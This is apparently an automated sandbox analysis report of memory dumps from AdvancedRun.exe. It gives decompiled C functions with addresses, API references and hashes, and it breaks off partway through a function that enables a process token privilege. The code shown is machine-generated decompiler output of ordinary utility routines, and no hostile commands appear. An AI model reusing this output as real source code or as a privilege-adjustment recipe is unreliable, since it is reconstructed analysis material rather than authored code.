                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: _snwprintf
                                                                                                                    • String ID: %%-%d.%ds
                                                                                                                    • API String ID: 3988819677-2008345750
                                                                                                                    • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                    • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                                    • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                    • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                                                                    0x00405080
                                                                                                                    0x00405086
                                                                                                                    0x0040508b
                                                                                                                    0x0040508e
                                                                                                                    0x00405091
                                                                                                                    0x00405097
                                                                                                                    0x0040509d
                                                                                                                    0x004050a4
                                                                                                                    0x004050ab
                                                                                                                    0x004050b2
                                                                                                                    0x004050b5
                                                                                                                    0x004050bc
                                                                                                                    0x004050cb
                                                                                                                    0x004050e0
                                                                                                                    0x004050cd
                                                                                                                    0x004050d1
                                                                                                                    0x004050dc
                                                                                                                    0x004050dc

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FileNameOpenwcscpy
                                                                                                                    • String ID: L
                                                                                                                    • API String ID: 3246554996-2909332022
                                                                                                                    • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                    • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                                    • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                    • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                                                                    0x00409072
                                                                                                                    0x00409074
                                                                                                                    0x0040907d
                                                                                                                    0x00409086
                                                                                                                    0x0040908e
                                                                                                                    0x004090a5
                                                                                                                    0x004090a5
                                                                                                                    0x0040908e
                                                                                                                    0x004090ac

                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID: LookupAccountSidW$Y@
                                                                                                                    • API String ID: 190572456-2352570548
                                                                                                                    • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                    • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                                    • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                    • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 37%
                                                                                                                    			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}







                                                                                                                    0x0040ad8c
                                                                                                                    0x0040ad93
                                                                                                                    0x0040ad95
                                                                                                                    0x0040ad9d
                                                                                                                    0x0040ada5
                                                                                                                    0x0040adb2
                                                                                                                    0x0040adb2
                                                                                                                    0x0040adb5
                                                                                                                    0x0040adbf

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                      • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                                    • String ID: shlwapi.dll
                                                                                                                    • API String ID: 4092907564-3792422438
                                                                                                                    • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                    • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                                    • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                    • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                                                                    0x00406597
                                                                                                                    0x00406598
                                                                                                                    0x004065a0
                                                                                                                    0x004065aa
                                                                                                                    0x004065ac
                                                                                                                    0x004065ac
                                                                                                                    0x004065bd

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                    • wcsrchr.MSVCRT ref: 004065A0
                                                                                                                    • wcscat.MSVCRT ref: 004065B6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                    • String ID: _lng.ini
                                                                                                                    • API String ID: 383090722-1948609170
                                                                                                                    • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                    • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                                    • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                    • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                    0x0040ac59
                                                                                                                    0x0040ac60
                                                                                                                    0x0040ac68
                                                                                                                    0x0040ac6d
                                                                                                                    0x0040ac75
                                                                                                                    0x0040ac7b
                                                                                                                    0x00000000
                                                                                                                    0x0040ac7b
                                                                                                                    0x0040ac6d
                                                                                                                    0x0040ac80

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                      • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                    • API String ID: 946536540-880857682
                                                                                                                    • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                    • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                    • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                    • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                                                                    0x00406670
                                                                                                                    0x0040667a
                                                                                                                    0x00406680
                                                                                                                    0x00406686
                                                                                                                    0x0040668b
                                                                                                                    0x0040668d
                                                                                                                    0x00406693
                                                                                                                    0x00406699
                                                                                                                    0x0040669f
                                                                                                                    0x004066a9
                                                                                                                    0x004066ac
                                                                                                                    0x004066af
                                                                                                                    0x004066b9
                                                                                                                    0x004066c7
                                                                                                                    0x004066d9
                                                                                                                    0x004066c9
                                                                                                                    0x004066c9
                                                                                                                    0x004066cc
                                                                                                                    0x004066cf
                                                                                                                    0x004066d2
                                                                                                                    0x004066d5
                                                                                                                    0x004066d5
                                                                                                                    0x004066db
                                                                                                                    0x004066dd
                                                                                                                    0x004066e0
                                                                                                                    0x004066e8
                                                                                                                    0x004066fa
                                                                                                                    0x004066ea
                                                                                                                    0x004066ea
                                                                                                                    0x004066ed
                                                                                                                    0x004066f0
                                                                                                                    0x004066f3
                                                                                                                    0x004066f6
                                                                                                                    0x004066f6
                                                                                                                    0x004066fc
                                                                                                                    0x004066fe
                                                                                                                    0x00406701
                                                                                                                    0x00406709
                                                                                                                    0x0040671b
                                                                                                                    0x0040670b
                                                                                                                    0x0040670b
                                                                                                                    0x0040670e
                                                                                                                    0x00406711
                                                                                                                    0x00406714
                                                                                                                    0x00406717
                                                                                                                    0x00406717
                                                                                                                    0x0040671d
                                                                                                                    0x0040671f
                                                                                                                    0x00406722
                                                                                                                    0x0040672a
                                                                                                                    0x0040673c
                                                                                                                    0x0040672c
                                                                                                                    0x0040672c
                                                                                                                    0x0040672f
                                                                                                                    0x00406732
                                                                                                                    0x00406735
                                                                                                                    0x00406738
                                                                                                                    0x00406738
                                                                                                                    0x0040673f
                                                                                                                    0x00406745

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@$memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1860491036-0
                                                                                                                    • Opcode ID: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                    • Instruction ID: f950f85206354bd8a0b3bb5dce35e971dba3beadb745d31d99e8bf3535aee89b
                                                                                                                    • Opcode Fuzzy Hash: e85a19cc904d935af36f35088f158f19d60a259a6de7382aef0aa8ca398aac1e
                                                                                                                    • Instruction Fuzzy Hash: F121D4B0A007008FD7219F2AC448956FBE8FF90314B2689BFD15ADB2B1D7B89441DF18
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004054DF, Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004054DF(signed int* __eax, void* __ecx, wchar_t* _a4) {
				int _v8;
				signed int _v12;
				void* __edi;
				int _t32;
				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                                                                    0x004054ea
                                                                                                                    0x004054ec
                                                                                                                    0x004054f1
                                                                                                                    0x004054f4
                                                                                                                    0x004054f7
                                                                                                                    0x004054fa
                                                                                                                    0x004054fe
                                                                                                                    0x00405501
                                                                                                                    0x00405505
                                                                                                                    0x00405508
                                                                                                                    0x0040550b
                                                                                                                    0x0040551b
                                                                                                                    0x0040550d
                                                                                                                    0x0040550f
                                                                                                                    0x0040550f
                                                                                                                    0x00405521
                                                                                                                    0x00405527
                                                                                                                    0x0040552b
                                                                                                                    0x0040552e
                                                                                                                    0x0040553f
                                                                                                                    0x00405530
                                                                                                                    0x00405532
                                                                                                                    0x00405532
                                                                                                                    0x00405556
                                                                                                                    0x00405561
                                                                                                                    0x0040556e
                                                                                                                    0x00405571
                                                                                                                    0x00405578
                                                                                                                    0x0040557e

                                                                                                                    APIs
                                                                                                                    • wcslen.MSVCRT ref: 004054EC
                                                                                                                    • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                                                                      • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                                                                      • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                                                                      • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                    • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                                                                    • memcpy.MSVCRT ref: 00405556
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 726966127-0
                                                                                                                    • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                    • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                                                                    • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                                                                    • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 81%
                                                                                                                    			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}













                                                                                                                    0x00405adf
                                                                                                                    0x00405ae6
                                                                                                                    0x00405af5
                                                                                                                    0x00405af6
                                                                                                                    0x00405afb
                                                                                                                    0x00405b00
                                                                                                                    0x00405b0a
                                                                                                                    0x00405b18
                                                                                                                    0x00405b19
                                                                                                                    0x00405b1e
                                                                                                                    0x00405b2c
                                                                                                                    0x00405b2d
                                                                                                                    0x00405b36
                                                                                                                    0x00405b37
                                                                                                                    0x00405b3c
                                                                                                                    0x00405b4a
                                                                                                                    0x00405b4b
                                                                                                                    0x00405b54
                                                                                                                    0x00405b55
                                                                                                                    0x00405b5a
                                                                                                                    0x00405b68
                                                                                                                    0x00405b69
                                                                                                                    0x00405b72
                                                                                                                    0x00405b73
                                                                                                                    0x00405b7b
                                                                                                                    0x00000000
                                                                                                                    0x00405b7b
                                                                                                                    0x00405b80

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1033339047-0
                                                                                                                    • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                    • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                                                                    • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                                                                    • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Analysis Process: AdvancedRun.exe PID: 5908 Parent PID: 3336 AdvancedRun.exeCOMMON

                                                                                                                    Executed Functions

                                                                                                                    Function 00408FC9, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00408FC9(struct HINSTANCE__** __eax, void* __eflags, WCHAR* _a4) {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* __esi;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				long _t19;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__** _t35;
				void* _t37;

				_t37 = __eflags;
				_t35 = __eax;
				if(E00408F92(_t35, _t37, GetCurrentProcess(), 0x28,  &_v8) == 0) {
					return GetLastError();
				}
				_t16 = E00408F72(_t35);
				__eflags = _t16;
				if(_t16 != 0) {
					_t24 = GetProcAddress( *_t35, "LookupPrivilegeValueW");
					__eflags = _t24;
					if(_t24 != 0) {
						LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
					}
				}
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				_a4 = _v8;
				_t18 = E00408F72(_t35);
				__eflags = _t18;
				if(_t18 != 0) {
					_t22 = GetProcAddress( *_t35, "AdjustTokenPrivileges");
					__eflags = _t22;
					if(_t22 != 0) {
						AdjustTokenPrivileges(_a4, 0,  &_v24, 0, 0, 0); // executed
					}
				}
				_t19 = GetLastError();
				FindCloseChangeNotification(_v8); // executed
				return _t19;
			}














                                                                                                                    0x00408fc9
                                                                                                                    0x00408fd0
                                                                                                                    0x00408fe8
                                                                                                                    0x00000000
                                                                                                                    0x00408fea
                                                                                                                    0x00408ff4
                                                                                                                    0x00409001
                                                                                                                    0x00409003
                                                                                                                    0x0040900c
                                                                                                                    0x0040900e
                                                                                                                    0x00409010
                                                                                                                    0x0040901a
                                                                                                                    0x0040901a
                                                                                                                    0x00409010
                                                                                                                    0x0040901f
                                                                                                                    0x00409026
                                                                                                                    0x0040902d
                                                                                                                    0x00409030
                                                                                                                    0x00409035
                                                                                                                    0x00409037
                                                                                                                    0x00409040
                                                                                                                    0x00409042
                                                                                                                    0x00409044
                                                                                                                    0x00409051
                                                                                                                    0x00409051
                                                                                                                    0x00409044
                                                                                                                    0x00409053
                                                                                                                    0x0040905e
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                      • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00408FEA
